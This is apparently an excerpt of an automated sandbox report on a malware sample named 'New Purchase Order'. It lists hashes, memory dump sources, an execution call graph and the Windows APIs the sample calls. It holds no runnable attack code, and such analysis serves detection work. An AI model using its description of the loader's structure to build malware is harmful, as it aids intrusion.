                          • Instruction Fuzzy Hash: 0801A7710083449AE7104A2ACD847E7FF98EF42324F18C56AED1A4A2DAC279D8C0D6F1
                          Function 00C1D730 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693395207.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c1d000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22d18a18d0ee037d3302d123aecf26de690ec9b22f9533ea27173862bb5eec6a
                          • Instruction ID: 07853f925d88492b8165d5810c1390445d985247c052ae24cc0bb2b821695150
                          • Opcode Fuzzy Hash: 22d18a18d0ee037d3302d123aecf26de690ec9b22f9533ea27173862bb5eec6a
                          • Instruction Fuzzy Hash: 37F0C2720043449AE7108A1ACC84BA7FFA8EF91734F18C55AED094E286C2799880CAB0

                          Non-executed Functions

                          Function 06F47630 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 782bbfb7a96b1d4db163d8c27b6547b7917af10057e6a4a2247a900a75e61e79
                          • Instruction ID: d4ab0704223cfa0e62ba539e2bc2420ed52592bbd179bcd1945497bd0c48abf5
                          • Opcode Fuzzy Hash: 782bbfb7a96b1d4db163d8c27b6547b7917af10057e6a4a2247a900a75e61e79
                          • Instruction Fuzzy Hash: 40E12D74E001198FDB14EFA9C6809AEFBF2FF49304F248169D414A775ADB35A941CFA1
                          Function 06F45550 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d56cd47786c38c3d77346595b6bb6020a5203c93dac8c5b712e5e3b5de47d2cb
                          • Instruction ID: cf194b1081e42110424935cbf82f1b819c84da53d56fb22d729b2083a6679ae3
                          • Opcode Fuzzy Hash: d56cd47786c38c3d77346595b6bb6020a5203c93dac8c5b712e5e3b5de47d2cb
                          • Instruction Fuzzy Hash: 66E10C74E001198FDB54EF99C6809AEFBF2FF49304F248169E414AB75ADB35A941CFA0
                          Function 06F45118 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 807871c85bd5c97c420d757d060f340c0066c4420a183314d9e5fb2b955d9efe
                          • Instruction ID: b2f718a1952d579824add87f8ffcaeaebc44f18db660cbdb18eac8ca9ea7da89
                          • Opcode Fuzzy Hash: 807871c85bd5c97c420d757d060f340c0066c4420a183314d9e5fb2b955d9efe
                          • Instruction Fuzzy Hash: D1E1FD74E001198FCB54EFA9C6809AEFBF2FF89305F248159D414AB756DB35A941CFA0
                          Function 06F46D58 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d33f08b490f3e552afaae8171d305cc37338a0e0313396cca4f9761026a6bb0
                          • Instruction ID: 15a0d37f2b8a72e186c2f06cc0628c6d1491cd91238f26423c6a8cb620af5e31
                          • Opcode Fuzzy Hash: 1d33f08b490f3e552afaae8171d305cc37338a0e0313396cca4f9761026a6bb0
                          • Instruction Fuzzy Hash: C4E1FD74E001198FCB54DFA9C6809AEFBF2FF89304F248169E414AB756DB35A941CFA0
                          Function 06F47B40 Relevance: .3, Instructions: 312COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 312e8ab856403f2a134902038fbe9d58f9326711f220b7b7874aba9fcfc1b1b0
                          • Instruction ID: add6942521be82334ca7563b9bf0fffe2fba49bffd21c7c66a5c6c30321b5ffd
                          • Opcode Fuzzy Hash: 312e8ab856403f2a134902038fbe9d58f9326711f220b7b7874aba9fcfc1b1b0
                          • Instruction Fuzzy Hash: 46E1EB74E001198FDB54EF99C6809AEFBB2FF49304F248169E418A7756DB35AD41CFA0
                          Function 02A27707 Relevance: .3, Instructions: 269COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1694595355.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2a20000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5687781dec2dc270a75fb1110ac54e7f9dc1fabb5b9f8107c896fd04a445dabe
                          • Instruction ID: 7743f444306e5a5f3f057e57e62edb10c5b6ab84451126c107051883fe743ffc
                          • Opcode Fuzzy Hash: 5687781dec2dc270a75fb1110ac54e7f9dc1fabb5b9f8107c896fd04a445dabe
                          • Instruction Fuzzy Hash: 97D1F631D1075A8ACB11EB64DA90ADDB7B1FFD6300F10879AE00937655EF70AAC9CB91
                          Function 02A27718 Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1694595355.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2a20000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: de6bc4533848ee76562be7167ee24d23a8bc17821c41444faef83180cea61531
                          • Instruction ID: ee15f39e2c4cd52fb9cd8cd106c1806d3ed6655334f77f52396bf0937e8a83e8
                          • Opcode Fuzzy Hash: de6bc4533848ee76562be7167ee24d23a8bc17821c41444faef83180cea61531
                          • Instruction Fuzzy Hash: 8FD1E531D1075A8ACB01EB64DA50ADDB7B1FFD5300F10879AE00937655EF70AAC9CB91
                          Function 00C8D5BC Relevance: .3, Instructions: 264COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1693603879.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_c80000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f8f4b50f4992d0b5ad7eb623f5ddf9276bd32051b0d591b530051832608b158
                          • Instruction ID: e8d2de42cea379f2aaf46f47c5d9d1874d568d6e0c9545e236fbe877773ba685
                          • Opcode Fuzzy Hash: 6f8f4b50f4992d0b5ad7eb623f5ddf9276bd32051b0d591b530051832608b158
                          • Instruction Fuzzy Hash: C3A13A32E00209CFCF05EFA5C88459EB7B2FF85304B25857EE815AB265DB71E956CB40
                          Function 06F4761F Relevance: .1, Instructions: 134COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d273675acdc2c405ba363ea58ee2aa58eba78b7b007f71fb6b2c045aab378749
                          • Instruction ID: e136e8f97ce6227a7757bc2733cef0bcdd7200ca56db22dd4a8dba7473571468
                          • Opcode Fuzzy Hash: d273675acdc2c405ba363ea58ee2aa58eba78b7b007f71fb6b2c045aab378749
                          • Instruction Fuzzy Hash: EC512B70E002198FDB54DFA9C9805AEFBF2EF89304F24C169D418A7756DB359A42CFA1
                          Function 06F47B30 Relevance: .1, Instructions: 134COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22740ba777b0d5d3da0aec3aa8f536c05e0288b8ac395f96837e3fe9679574ec
                          • Instruction ID: 7adf2438cc9071fb1a2044070ef3f224152d5957685f77fced5d60494513bc7e
                          • Opcode Fuzzy Hash: 22740ba777b0d5d3da0aec3aa8f536c05e0288b8ac395f96837e3fe9679574ec
                          • Instruction Fuzzy Hash: D2513A74E002198FDB14DFA9CA809AEFBF2BF89304F24C169D418A7756DB359941CFA0
                          Function 06F45108 Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1700826086.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6f40000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4d4a95335de1280cc061a9be8a437d3194f18280dbd048c6b00dbd5176b8e2b
                          • Instruction ID: 7d7eb2868251c4233d5107e5386f3873d2cb116dbdba1c42aabdb2217cd443fe
                          • Opcode Fuzzy Hash: a4d4a95335de1280cc061a9be8a437d3194f18280dbd048c6b00dbd5176b8e2b
                          • Instruction Fuzzy Hash: 85512D70E012198FCB14DFA9C9805AEFBF2BF89304F24C16AD418A7756DB359A41CFA1
                          Function 02A2B730 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1694595355.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2a20000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1e551f8522cc9235377674fac32d2b4361f9e3dad6bf1d04161e2364528d0ad1
                          • Instruction ID: 3760a476a466a015589e498ee4626fc3835deec94a844e6bb3c18747801efd5f
                          • Opcode Fuzzy Hash: 1e551f8522cc9235377674fac32d2b4361f9e3dad6bf1d04161e2364528d0ad1
                          • Instruction Fuzzy Hash: 2311A771E117289BEB18CF6B8C4078EFBF3AFC9700F04C5AAD408AA254EB3019458F51

                          Execution Graph

                          Execution Coverage:1.2%
                          Dynamic/Decrypted Code Coverage:4.3%
                          Signature Coverage:6.7%
                          Total number of Nodes:163
                          Total number of Limit Nodes:14
                          execution_graph 93481 424963 93482 42497f 93481->93482 93483 4249a7 93482->93483 93484 4249bb 93482->93484 93485 42c593 NtClose 93483->93485 93491 42c593 93484->93491 93487 4249b0 93485->93487 93488 4249c4 93494 42e753 RtlAllocateHeap 93488->93494 93490 4249cf 93492 42c5ad 93491->93492 93493 42c5be NtClose 93492->93493 93493->93488 93494->93490 93495 42f923 93496 42f893 93495->93496 93497 42f8f0 93496->93497 93501 42e713 93496->93501 93499 42f8cd 93504 42e633 93499->93504 93507 42c8a3 93501->93507 93503 42e72e 93503->93499 93510 42c8f3 93504->93510 93506 42e64c 93506->93497 93508 42c8c0 93507->93508 93509 42c8d1 RtlAllocateHeap 93508->93509 93509->93503 93511 42c90d 93510->93511 93512 42c91e RtlFreeHeap 93511->93512 93512->93506 93513 4119e3 93514 4119f8 93513->93514 93519 413cb3 93514->93519 93517 42c593 NtClose 93518 411a11 93517->93518 93521 413cd9 93519->93521 93520 411a04 93520->93517 93521->93520 93523 413a33 93521->93523 93524 413a55 93523->93524 93526 42c813 93523->93526 93524->93520 93527 42c830 93526->93527 93530 1172c70 LdrInitializeThunk 93527->93530 93528 42c858 93528->93524 93530->93528 93531 418d83 93533 418db3 93531->93533 93534 418ddf 93533->93534 93535 41b283 93533->93535 93536 41b2c7 93535->93536 93537 41b2e8 93536->93537 93538 42c593 NtClose 93536->93538 93537->93533 93538->93537 93539 413fa3 93540 413fa4 93539->93540 93545 417733 93540->93545 93542 413fdb 93543 414020 93542->93543 93544 41400f PostThreadMessageW 93542->93544 93544->93543 93546 417757 93545->93546 93547 417793 LdrLoadDll 93546->93547 93548 41775e 93546->93548 93547->93548 93548->93542 93549 401b28 93550 401b30 93549->93550 93553 42fcc3 93550->93553 93556 42e1e3 93553->93556 93557 42e209 93556->93557 93568 4074c3 93557->93568 93559 42e21f 93567 401b49 93559->93567 93571 41b093 93559->93571 93561 42e23e 93564 42e253 93561->93564 93586 42c943 93561->93586 93582 428243 93564->93582 93565 42e26d 93566 42c943 ExitProcess 93565->93566 93566->93567 93589 4163f3 93568->93589 93570 4074d0 93570->93559 93572 41b0bf 93571->93572 93607 41af83 93572->93607 93575 41b104 93578 42c593 NtClose 93575->93578 93579 41b120 93575->93579 93576 41b0ec 93577 42c593 NtClose 93576->93577 93580 41b0f7 93576->93580 93577->93580 93581 41b116 93578->93581 93579->93561 93580->93561 93581->93561 93583 4282a5 93582->93583 93585 4282b2 93583->93585 93618 418593 93583->93618 93585->93565 93587 42c960 93586->93587 93588 42c971 ExitProcess 93587->93588 93588->93564 93590 416410 93589->93590 93592 416429 93590->93592 93593 42cfd3 93590->93593 93592->93570 93595 42cfed 93593->93595 93594 42d01c 93594->93592 93595->93594 93600 42bbc3 93595->93600 93598 42e633 RtlFreeHeap 93599 42d08f 93598->93599 93599->93592 93601 42bbe0 93600->93601 93604 1172c0a 93601->93604 93602 42bc0c 93602->93598 93605 1172c11 93604->93605 93606 1172c1f LdrInitializeThunk 93604->93606 93605->93602 93606->93602 93608 41af9d 93607->93608 93612 41b079 93607->93612 93613 42bc63 93608->93613 93611 42c593 NtClose 93611->93612 93612->93575 93612->93576 93614 42bc80 93613->93614 93617 11735c0 LdrInitializeThunk 93614->93617 93615 41b06d 93615->93611 93617->93615 93620 41859c 93618->93620 93619 418abb 93619->93585 93620->93619 93626 413c13 93620->93626 93622 4186e4 93622->93619 93623 42e633 RtlFreeHeap 93622->93623 93624 4186fc 93623->93624 93624->93619 93625 42c943 ExitProcess 93624->93625 93625->93619 93630 413c33 93626->93630 93628 413c92 93628->93622 93629 413c9c 93629->93622 93630->93629 93631 41b3a3 RtlFreeHeap LdrInitializeThunk 93630->93631 93631->93628 93632 42bb73 93633 42bb90 93632->93633 93636 1172df0 LdrInitializeThunk 93633->93636 93634 42bbb8 93636->93634 93637 428933 93638 428998 93637->93638 93639 4289d3 93638->93639 93642 418ad3 93638->93642 93641 4289b5 93643 418ae7 93642->93643 93644 418a92 93642->93644 93643->93641 93645 42c943 ExitProcess 93644->93645 93646 418abb 93645->93646 93646->93641 93647 424cf3 93651 424d0c 93647->93651 93648 424d54 93649 42e633 RtlFreeHeap 93648->93649 93650 424d64 93649->93650 93651->93648 93652 424d97 93651->93652 93654 424d9c 93651->93654 93653 42e633 RtlFreeHeap 93652->93653 93653->93654 93655 42f7f3 93656 42f803 93655->93656 93657 42f809 93655->93657 93658 42e713 RtlAllocateHeap 93657->93658 93659 42f82f 93658->93659 93660 428b93 93661 428bf7 93660->93661 93662 428c2e 93661->93662 93665 4243a3 93661->93665 93664 428c10 93666 4243a5 93665->93666 93667 4244a4 93666->93667 93668 424533 93666->93668 93669 424548 93666->93669 93667->93664 93670 42c593 NtClose 93668->93670 93671 42c593 NtClose 93669->93671 93672 42453c 93670->93672 93674 424551 93671->93674 93672->93664 93673 424588 93673->93664 93674->93673 93675 42e633 RtlFreeHeap 93674->93675 93676 42457c 93675->93676 93676->93664 93677 1172b60 LdrInitializeThunk 93678 418cd8 93679 42c593 NtClose 93678->93679 93680 418ce2 93679->93680

                          Executed Functions

                          Function 00417733 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 197 417733-41774f 198 417757-41775c 197->198 199 417752 call 42f333 197->199 200 417762-417770 call 42f933 198->200 201 41775e-417761 198->201 199->198 204 417780-417791 call 42dcb3 200->204 205 417772-41777d call 42fbd3 200->205 210 417793-4177a7 LdrLoadDll 204->210 211 4177aa-4177ad 204->211 205->204 210->211
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                          • Instruction ID: 8e2604fe3315099ce7e6592766d58e4e85df4a541fcdf6f6d68356c2e9832f5c
                          • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                          • Instruction Fuzzy Hash: CE0152B5E4020DA7DB10DBA1DC42FDEB3789B54308F4081A6E91897281F635EB488B95
                          Function 0042C593 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 238 42c593-42c5cc call 404773 call 42d7c3 NtClose
                          APIs
                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C5C7
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                          • Instruction ID: 4730e45dc8a455a10bbaf9a925c332d30bf1f4e4369036d8bfc9a482ac9e8ca9
                          • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                          • Instruction Fuzzy Hash: 30E046766102147BD220BB6ADC41F9B77ACEFC5B14F40441AFA18A7281C676BA1087A8
                          Function 01172B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 252 1172b60-1172b6c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
                          • Instruction ID: d9fdf5ad7e9440e9388ffef92a35ea2c03a56d9344a9d17c3742ebba62664d25
                          • Opcode Fuzzy Hash: 7aebf4c940c22565cc29f1d272763d2f8e796c9bfefeda14350d28faae302146
                          • Instruction Fuzzy Hash: 5D90026120240003410971584554616900B97E0301B95C021E1015594DC62589916625
                          Function 01172DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 1172df0-1172dfc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
                          • Instruction ID: 63756e7fd5da4fd36a3f1182157030af8d747adf4f309803bfa934bb0df512fc
                          • Opcode Fuzzy Hash: 4d4061570efd80a3cc4aa4f15102cf8b13808ac85b3651ffa0608c380bcd5e67
                          • Instruction Fuzzy Hash: B390023120140413D11571584644707500A97D0341FD5C412A042555CDD7568A52A621
                          Function 01172C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 253 1172c70-1172c7c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
                          • Instruction ID: 12584dcfc6e0ebf2ec5221abe288403f392952b7b3806c6cd67449f86981811b
                          • Opcode Fuzzy Hash: 36ba8ce39f5fc548fe1fc40b651a6753097e36345136d29a8f0e095ec267921d
                          • Instruction Fuzzy Hash: C790023120148802D1147158854474A500697D0301F99C411A442565CDC79589917621
                          Function 011735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ed6318108bea49f66465e2b3bad4e036d5011da3cec79e6d56d33c2bb0003c88
                          • Instruction ID: 4906bf1bc05195010159c2c7849f14b1f4edd5181bee2e47cd6cbabfdcd530a4
                          • Opcode Fuzzy Hash: ed6318108bea49f66465e2b3bad4e036d5011da3cec79e6d56d33c2bb0003c88
                          • Instruction Fuzzy Hash: 9390023160550402D10471584654706600697D0301FA5C411A042556CDC7958A516AA2
                          Function 00413E32 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 186COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 413e32-413e3b 1 413ea2-413ebf 0->1 2 413e3d-413e40 0->2 3 413ec1-413ec8 1->3 4 413f1a-413f21 1->4 5 413e12-413e17 2->5 6 413e42-413e51 2->6 7 413eca-413ecc 3->7 8 413f3d-413f42 3->8 9 413f25 4->9 5->0 6->0 10 413e53-413e79 6->10 11 413ecd-413ed4 7->11 14 413f60-413f71 8->14 15 413f44-413f5e 8->15 12 413fa4-413fe2 call 42e6d3 call 42f0e3 call 417733 call 4046e3 9->12 13 413f27 9->13 16 413e7b-413e9f 10->16 17 413ede 10->17 11->9 19 413ed6-413eda 11->19 22 413fe6-41400d call 424e13 12->22 13->11 20 413f2a-413f3b 13->20 21 413f73-413f7a 14->21 14->22 15->14 16->1 19->17 20->8 21->12 31 41402d-414033 22->31 32 41400f-41401e PostThreadMessageW 22->32 32->31 34 414020-41402a 32->34 34->31
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3h8t0-08$3h8t0-08$a~V
                          • API String ID: 0-2215303234
                          • Opcode ID: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                          • Instruction ID: 5f72fba8100ebba8870b20796ede5c15298c30b13232037c41d5cf2924e7c9ec
                          • Opcode Fuzzy Hash: 81d29a8e1ef3792b9a479a4fc0f87079d8a20a8fd8b90cc9f61c1d646faaf081
                          • Instruction Fuzzy Hash: EC510232D482996FCB12CF708CC2DDEBFB9DE42345B4840ADE4446B242D6298E07C7D5
                          Function 00413FA3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          • Opcode ID: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                          • Instruction ID: e1e66dc98035f04d2431884f0e0db6d51c4b26c5f5f1261c7f2f59727122a13f
                          • Opcode Fuzzy Hash: 6bcb1862a996d30975c64d4a1bb3983db3ea12b872ae8d1a2c4248d6048350d8
                          • Instruction Fuzzy Hash: 600104B1D0021C7AEB11AAE29C81DEF7B7CDF80398F408069FA04A7241D6784E068BB5
                          Function 00413F9F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 51 413f9f-41401e PostThreadMessageW 53 414020-41402a 51->53 54 41402d-414033 51->54 53->54
                          APIs
                          • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 0041401A
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID: 3h8t0-08$3h8t0-08
                          • API String ID: 1836367815-1947605396
                          • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                          • Instruction ID: 1603f725fde6bf5af95b6af14f59adfb275f0ca4856cf2d9dab87d41540ea272
                          • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                          • Instruction Fuzzy Hash: D6D0A732A4510865831355E56C41CFE7F7CD9C6755B0001A7EE04C4140F609491716E2
                          Function 00417726 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 212 417726-41772e 213 417730-41775c call 42f333 212->213 214 417793-4177a7 LdrLoadDll 212->214 218 417762-417770 call 42f933 213->218 219 41775e-417761 213->219 215 4177aa-4177ad 214->215 222 417780-417791 call 42dcb3 218->222 223 417772-41777d call 42fbd3 218->223 222->214 222->215 223->222
                          APIs
                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177A5
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_400000_New Purchase Order.jbxd
                          Yara matches
                          Similarity
                          • API ID: Load
                          • String ID:
                          • API String ID: 2234796835-0
                          • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                          • Instruction ID: 9cb1692463f57b7dfc76d45307d73cb454a5d3a2701c0a14866b4d9e4b00da90
                          • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                          • Instruction Fuzzy Hash: 7CF0B475E4410DABDF10DAD4D881FDDB7B5EB54318F00C2E6ED1C9B280E531EA498B90
                          Function 0042C8F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 233 42c8f3-42c934 call 404773 call 42d7c3 RtlFreeHeap
                          APIs
                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,00416FB5,000000F4), ref: 0042C92F
                          Memory Dump Source
                          • Source File: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
